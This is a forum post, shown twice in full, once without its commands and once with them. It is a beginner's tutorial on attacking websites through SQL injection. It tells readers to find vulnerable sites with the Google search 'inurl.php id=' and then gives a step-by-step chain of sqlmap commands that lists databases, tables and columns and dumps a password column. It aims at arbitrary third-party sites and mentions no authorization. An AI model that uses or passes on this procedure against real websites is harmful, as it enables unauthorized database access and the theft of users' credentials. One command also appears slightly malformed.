September 30, 2022 at 12:51 AM
Maybe it would be cool to show an easy sql attack.
First you need an attack program.
Then use google to find a website suitable for the attack. Simply enter the phrase "inurl.php id=" into the search engine. Displays pages that have the "GET" parameter enabled
With this command, you will get a statement of the entire database, if you succeed, nothing will stop you
Then instead of "--dbs" try, for example,
and then
And then select the column you want to get information about
And you have what you need, good for a start, right?
If anyone has a newer and easier way of sql injection, please send it. I like to learn from the best.
I know this is a complete foundation, but 10 years ago it would have definitely been useful for me when I was learning. If anyone has any other tutorials for beginners. Thank you and sorry for my english.
First you need an attack program.
sudo apt install sqlmapThen use google to find a website suitable for the attack. Simply enter the phrase "inurl.php id=" into the search engine. Displays pages that have the "GET" parameter enabled
inurl.php id=With this command, you will get a statement of the entire database, if you succeed, nothing will stop you
sqlmap -u "someweb.com?id=5" --dbsThen instead of "--dbs" try, for example,
sqlmap -u "someweb.com?id=5" --dbs table_local_dbs --tablesand then
sqlmap -u "someweb.com?id=5" -D table_local_dbs -T example_Table --columnsAnd then select the column you want to get information about
sqlmap -u "someweb.com?id=5" -D table_local_dbs -T example_Table -C password --dumpAnd you have what you need, good for a start, right?
If anyone has a newer and easier way of sql injection, please send it. I like to learn from the best.
I know this is a complete foundation, but 10 years ago it would have definitely been useful for me when I was learning. If anyone has any other tutorials for beginners. Thank you and sorry for my english.